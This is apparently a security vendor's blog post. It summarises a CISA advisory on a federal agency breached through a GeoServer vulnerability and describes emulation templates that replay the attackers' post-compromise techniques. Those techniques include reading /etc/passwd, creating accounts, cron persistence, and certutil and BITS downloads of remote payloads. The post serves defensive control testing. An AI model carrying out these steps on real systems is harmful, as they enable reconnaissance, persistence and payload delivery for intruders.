Introduction

On September 23, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Advisory (CSA). The advisory highlights lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and log aggregation in a centralized out-of-band location.

The CSA recounts an incident in which a U.S. federal civilian agency was compromised after attackers exploited a publicly disclosed vulnerability (CVE-2024-36401) in a GeoServer that allows unauthenticated users to gain remote code execution (RCE) on affected versions. The flaw had been published on June 30, 2024, and was added to CISA’s Known Exploited Vulnerabilities catalog on July 15, 2024. However, the agency had not yet patched the system, allowing adversaries to gain access first on July 11 and then again on July 24 through the same weakness. The intrusion lasted nearly three weeks before it was detected, during which the attackers conducted lateral movement inside the environment.

To prevent similar incidents, CISA stresses the importance of timely patching, especially for vulnerabilities cataloged as known exploited. Agencies and organizations should also ensure that incident response plans are current, exercised, and cover escalation procedures, third-party coordination, and tool access. Additionally, effective detection depends on comprehensive logging, centralized storage of logs, and continuous monitoring to identify unusual behavior. The advisory provides further technical details, including indicators of compromise and mappings to MITRE ATT&CK, to help defenders validate and strengthen their security measures.

AttackIQ has released two new assessment templates that include the post-compromise Tactics, Techniques and Procedures (TTPs) mentioned on the CSA to help customers validate their security controls and their ability to defend against sophisticated threats.

This assessment template emulates the GeoServer post-compromise Tactics, Techniques, and Procedures (TTP) and subsequent Linux-host behaviors detailed in the CISA Advisory AA25-266A.

Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Cron Job Persistence and Execution (T1053.003): This scenario used the cron utility to schedule commands for initial or recurring execution.

Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

Obtain Disk Space using “df” Command (T1082): This scenario executes df command to obtain detailed file system disk space usage information.

Process Discovery using “ps aux” Command (T1057): This scenario executes ps -aux command to lists all running processes with comprehensive details.

Account Discovery (T1087.001): This scenario executes the cat /etc/passwd command to get a list of local accounts.

System Network Configuration Discovery through Linux Command Line (T1016): This scenario executes ifconfig to obtain information available about the system’s network configuration.

Obtain System Information using “uname” Command (T1082): This scenario executes the uname -a command to obtain CPU architecture, hostname, and kernel information.

Obtain System Date using “date” Command (T1124): This scenario executes the date command to obtain the current system time, date, and timezone.

Obtain Last System Boot using “who” Command (T1124): This scenario executes the who -b command to obtain the date and time of the last system boot.

Samples

This section contains the samples mentioned in the CSA

2023-09 Stowaway Proxy Sample: The Stowaway Proxy Sample (SHA256: dff3e75f2f72f8123be76f010d7bd71f5f7508dfac84b2b52a721e779abc50c9) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

2017-06 Linux Exploit Sample: The Linux Exploit Sample (SHA256:  42202a67748c6a5eb735e8241ef144462d9323894579a2f063fa2f82c91eca08 ) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

This assessment template emulates the SQL Server post-compromise Tactics, Techniques, and Procedures (TTP) and subsequent Windows-host behaviors detailed in the CISA Advisory AA25-266A.

Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Create Account (T1136.001): This scenario attempts to create a new user into the system with the net user Windows command.

Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

System Network Connections Discovery (T1049): This scenario uses the native Windows command line tool netstat to collect active connections and any listening services running on the host.

Domain Administrator Accounts Discovery Via Net Command Script (T1087.002): This scenario executes net group command to list domain administrator accounts.

Obtain Username using “whoami” Command (T1033): This scenario executes the native whoami command to receive details of the running user account.

File and Directory Discovery Script (T1083): This scenario executes the native dir command to discover files and directories and outputs to a temporary file.

System Information Discovery Script (T1082): This scenario executes the systeminfo command to collect information about the compromised system.

Enumerate Local System Accounts via net Command (T1087.001): This scenario executes the net user command to enumerate all local system accounts.

Internet Connection Discovery using certutil Command (T1016.001): This scenario executes the certutil utility to try and download a file from a website and save it to a temporary directory.

Internet Connection Discovery via ping to 8.8.8.8 (T1016.001): This scenario executes ping command to check for Internet connectivity on compromised systems to determine if the system can communicate with its Command and Control (C2) servers.

Process Discovery Through Tasklist (T1057): This scenario enumerates processes running on the target asset through the tasklist Windows utility. The results are saved to a file in a temporary location.

Get IP Information through Windows Command Line (T1016): This scenario executes the ipconfig /all Windows command to retrieve information about all network adapters.

Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.

BITS Jobs Script (T1197): This scenario employs the bitsadmin native command to create a BITS job and configure it to download a remote payload. The Background Intelligent Transfer Service (BITS) is a mechanism used by legitimate applications to use a system’s idle bandwidth to retrieve files without disrupting other applications.

Wrap-up

In summary, these assessment templates will evaluate security and incident response processes and support the improvement of your security control posture against the recent activities carried out by threat actors. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against widely distributed and dangerous threats.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.